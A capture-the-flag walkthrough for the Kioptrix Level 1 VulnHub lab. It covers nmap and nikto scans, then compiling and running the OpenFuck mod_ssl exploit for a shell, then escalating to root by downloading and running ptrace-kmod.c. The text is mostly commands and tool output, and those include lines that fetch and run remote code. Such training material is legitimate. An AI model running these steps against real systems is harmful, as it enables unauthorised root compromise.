Tango Down (Kioptrix1) : Kioptrix Level 1 (#1) Challenge Walkthrough


Lab Environment :

Victim Host : https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ on VirtualBox
Attacking Host : KALI (On Virtual Box)
Network : Host-Only (VirtualBox)
Tools : As mentioned in the walkthrough below

Discovery :Changed the setting for the VMas host-only, ran an nmapscan

root@kali:~/tools/practice/bash/lab# nmap -sT 192.168.56.1-254

Starting Nmap6.47 ( http://nmap.org) at 2015-10-27 23:09 GMT
Nmapscan report for 192.168.56.1
Host is up (0.0036s latency).
All 1000 scanned ports on 192.168.56.1 are closed
MAC Address: 0A:00:27:00:00:00 (Unknown)

Nmapscan report for 192.168.56.100
Host is up (0.00012s latency).
All 1000 scanned ports on 192.168.56.100 are filtered
MAC Address: 08:00:27:BD:93:7E (CadmusComputer Systems)

Nmapscan report for 192.168.56.101
Host is up (0.0016s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
22/tcp open ssh
111/tcp open rpcbind
139/tcp open netbios-ssn
32768/tcpopen filenet-tms
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)

Nmapscan report for 192.168.56.110
Host is up (0.00030s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
22/tcpopen ssh

Nmapdone: 254 IP addresses (4 hosts up) scanned in 15.41 seconds

Additional Scan

root@kali:~/tools/practice/bash/lab# nmap-v -sS -sV -O 192.168.56.101

Starting Nmap6.47 ( http://nmap.org) at 2015-10-27 23:14 GMT
NSE: Loaded 29 scripts for scanning.
Initiating ARPPing Scan at 23:14
Scanning 192.168.56.101 [1 port]
Completed ARPPing Scan at 23:14, 0.01s elapsed (1 total hosts)
Initiating Parallel DNSresolution of 1 host. at 23:14
Completed Parallel DNSresolution of 1 host. at 23:14, 0.02s elapsed
Initiating SYN Stealth Scan at 23:14
Scanning 192.168.56.101 [1000 ports]
Discovered open port 443/tcpon 192.168.56.101
Discovered open port 139/tcpon 192.168.56.101
Discovered open port 22/tcpon 192.168.56.101
Discovered open port 111/tcpon 192.168.56.101
Discovered open port 80/tcpon 192.168.56.101
Discovered open port 32768/tcpon 192.168.56.101
Completed SYN Stealth Scan at 23:14, 0.34s elapsed (1000 total ports)
Initiating Service scan at 23:14
Scanning 6 services on 192.168.56.101
Completed Service scan at 23:14, 12.08s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.101
NSE: Script scanning 192.168.56.101.
Initiating NSEat 23:14
Completed NSEat 23:14, 0.04s elapsed
Nmapscan report for 192.168.56.101
Host is up (0.00031s latency).
Not shown: 994 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC#100000)
139/tcp open netbios-ssn Samba smbd(workgroup: 9DMYGROUP)
443/tcp open ssl/http Apache httpd1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
32768/tcpopen status 1 (RPC#100024)
MAC Address: 08:00:27:96:FA:49 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)
Uptime guess: 0.005 days (since Tue Oct 27 23:08:14 2015)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=195 (Good luck!)
IPID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmapdone: 1 IPaddress (1 host up) scanned in 14.50 seconds
Raw packets sent: 1020 (45.626KB) | Rcvd: 1018 (41.493KB)

So some vectors we see from above are :
  • SSH Server
  • Web Server (http,https)
  • Samba Server
  • NFS Server, Portmapper(111)
Tried accessing the web server:


Seems like a redhat server


Lets run some NMAPNSE's:

-- Tried http nmap nse's - no results
-- Tried SMB nse's, including smb-vulns-scan -- Nothing interesting


Vulnerability Assessment and Exploit :
Run Nikto:

root@kali:~/vulhub/kioptrix1.0# nikto -h 192.168.56.101
- Niktov2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.101
+ Target Hostname: 192.168.56.101
+ Target Port: 80
+ Start Time: 2015-10-27 23:33:56 (GMT0)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodesvia ETags, header found with file /, inode: 34821, size: 2890, mtime: Thu Sep 6 04:12:46 2001
+ The anti-clickjackingX-Frame-Options header is not present.
+ OSVDB-27487: Apache is vulnerable to XSSvia the Expect header
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.7). Apache 2.0.65 (final release) and 2.2.26 are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1e). OpenSSL0.9.8r is also current.
+ OSVDB-637: Enumeration of users is possible by requesting ~username(responds with 'Forbidden' for users, 'not found' for non-existent users).
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoSand possible code execution. CAN-2002-0392.+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizermay be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated: 10 error(s) and 18 item(s) reported on remote host
+ End Time: 2015-10-27 23:40:54 (GMT0) (418 seconds)
---------------------------------------------------------------------------

Found some vulnerabilities as above. Search for CVE-2002-0082 and you will get the below link :

https://www.exploit-db.com/exploits/764/

Once your download this , you need to compile and execute this :

root@kali:~/vulhub/kioptrix1.0# ls
764.c http-nse.txt smb-nse.txt

root@kali:~/vulhub/kioptrix1.0# gcc764.c -o openfk
764.c:651:2: error: unknown type name ‘RC4_KEY’
764.c:652:2: error: unknown type name ‘RC4_KEY’
764.c: In function ‘read_ssl_packet’:
764.c:844:7: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c:844:7: note: each undeclared identifier is reported only once for each function it appears in
764.c: In function ‘send_ssl_packet’:
764.c:882:2: error: unknown type name ‘MD5_CTX’
764.c:887:23: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘get_server_hello’:
764.c:1009:2: warning: passing argument 2 of ‘d2i_X509’ from incompatible pointer type [enabled by default]
In file included from /usr/include/openssl/ssl.h:156:0,
from 764.c:20:
/usr/include/openssl/x509.h:840:1: note: expected ‘constunsigned char **’ but argument is of type ‘unsigned char **’
764.c: In function ‘generate_key_material’:
764.c:1106:2: error: unknown type name ‘MD5_CTX’
764.c:1111:42: error: ‘MD5_DIGEST_LENGTH’ undeclared (first use in this function)
764.c: In function ‘generate_session_keys’:
764.c:1127:23: error: ‘RC4_KEY’ undeclared (first use in this function)
764.c:1127:31: error: expected expression before ‘)’ token
764.c:1131:32: error: expected expression before ‘)’ token

Now it is very likely that you get the above error while compiling. After hours of search I found the below link which can help in fixing the problem... (I so wish I knew c programming)

http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/
Here are the steps to make this work :

1) Add those headers :

#include
#include

2) Update the URL of the C file.

Search for wgetand replace the URL with this new one :
http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

3) Get libssl-devlib

Install them : apt-get install libssl-dev

4) Update declaration of variables

Line 961, change : unsigned char *p, *end;
By adding const: constunsigned char *p, *end;

5) Compile then code and you’re done

To compile :
gcc-o OpenFuck764.c -lcrypto 

root@kali:~/vulhub/kioptrix1.0# gccopenfk.c -o openfk-lcrypto

root@kali:~/vulhub/kioptrix1.0# ls -l
total 140
-rw-r--r-- 1 root root 33617 Oct 27 23:39 764.c
-rw-r--r-- 1 root root 2289 Oct 27 23:23 http-nse.txt
-rwxr-xr-x 1 root root 60991 Oct 27 23:47 openfk
-rw-r--r-- 1 root root 33684 Oct 27 23:46 openfk.c
-rw-r--r-- 1 root root 351 Oct 27 23:24 smb-nse.txt
root@kali:~/vulhub/kioptrix1.0# ./openfk

*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

: Usage: ./openfktarget box [port] [-c N]

target - supported box eg: 0x00
box - hostnameor IPaddress
port - port for sslconnection
-c open N connections. (use range 40-50 if u dontknow)
++++ Truncated++++++++++++++++++

Now for the targets, the closest as per our version match from nmapis as below
0x6a - RedHatLinux 7.2 (apache-1.3.20-16)1
0x6b - RedHatLinux 7.2 (apache-1.3.20-16)2

nmapoutput : 80/tcp open http Apache httpd1.3.20((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)


Running the exploit
root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6a 192.168.56.101 443 -c 50
*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

Connection... 50 of 50
Establishing SSLconnection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!

0x6a did not give us a shell, lets try the other one... 0x6b



root@kali:~/vulhub/kioptrix1.0# ./openfk 0x6b 192.168.56.101 443 -c 50

*******************************************************************
* OpenFuckv3.0.32-root priv8 by SPABAMbased on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam- LSD-pl - SolarEclipse- CORE *
* #hackarena irc.brasnet.org *
* TNXXanthicUSG #SilverLords#BloodBR#isotk#highsecure#uname*
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC#TechTeam*
* #pinchadoreswebHiTechHateDigitalWrapperzP()W GATButtP!rateZ*
*******************************************************************

Connection... 50 of 50
Establishing SSLconnection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
bash-2.05$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)
bash-2.05$ hostname
hostname
kioptrix.level1
bash-2.05$ uname-a
uname-a
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep6 16:46:36 EDT 2001 i686 unknown
bash-2.05$ cat /etc/release
cat /etc/release
cat: /etc/release: No such file or directory
bash-2.05$ cat /etc/issue
cat /etc/issue
Welcome to Kioptrix Level 1 Penetration and Assessment Environment

--The object of this game:
|_Acquire "root" access to this machine.

There are many ways this can be done, try and find more then one way to
appreciate this exercise.

DISCLAIMER: Kioptrixis not resposiblefor any damage or instability
caused by running, installing or using this VMimage.
Use at your own risk.

WARNING: This is a vulnerable system, DO NOT run this OS in a production
environment. Nor should you give this system access to the outside world
(the Internet - or Interwebs..)

Good luck and have fun!

bash-2.05$ Good Bye!

Now we are in and have a shell. Time for escalating our privileges.

Privilege Escalation
We see when we run the above exploit, it tries to download the ptrace-kmod.c to give us a root shell, however that doesnthappen.

exploits/ptrace-kmod.c; gcc-o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--23:51:51-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'

What we can do is to manually download this file on your host :

http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

Once you download it, compile it .. when I compile it on my Kali node, below is what I get..

root@kali:~/vulhub/kioptrix1.0# gcc895.c -o privesc1
895.c:80:1: warning: missing terminating " character [enabled by default]
895.c:80:1: error: missing terminating " character
895.c:81:1: error: stray ‘\’ in program
895.c:81:1: error: stray ‘\’ in program
895.c:81:2: error: ‘x00’ undeclared here (not in a function)
895.c:81:6: error: expected ‘,’ or ‘;’ before ‘x00’
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:81:6: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program
895.c:82:1: error: stray ‘\’ in program

This is full of errors, probably its a new compiler version so this problem. What I did was that I downloaded this c file from my attacking node to the victim node, compiled it on that node only as this was older version. Post compilation I ran the binarybash-2.05$ wget http://192.168.56.110/ptrace-kmod.c

wget http://192.168.56.110/ptrace-kmod.c
--00:05:36-- http://192.168.56.110/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.110:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]

0K ... 100% @ 3.74 MB/s

00:05:36 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]

bash-2.05$ ls
ls
895.c
ptrace-kmod.c
bash-2.05$ gccptrace-kmodc-o ptrace
gccptrace-kmodc-o ptrace
gcc: ptrace-kmodc: No such file or directory
gcc: No input files
bash-2.05$ gccptrace-kmodc.c -o ptrace
gccptrace-kmodc.c -o ptrace
gcc: ptrace-kmodc.c: No such file or directory
gcc: No input files
bash-2.05$ gccptrace-kmod.c -o ptrace
gccptrace-kmod.c -o ptrace
bash-2.05$ ls
ls
895.c
ptrace
ptrace-kmod.c
bash-2.05$ chmod+x ptrace
chmod+x ptrace
bash-2.05$ ./ptrace
./ptrace
[+] Attached to 6416
[+] Waiting for signal
[+] Signal caught
[+] Shellcodeplaced at 0x4001189d
[+] Now wait for suidshell...


id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)


We are now as root in the node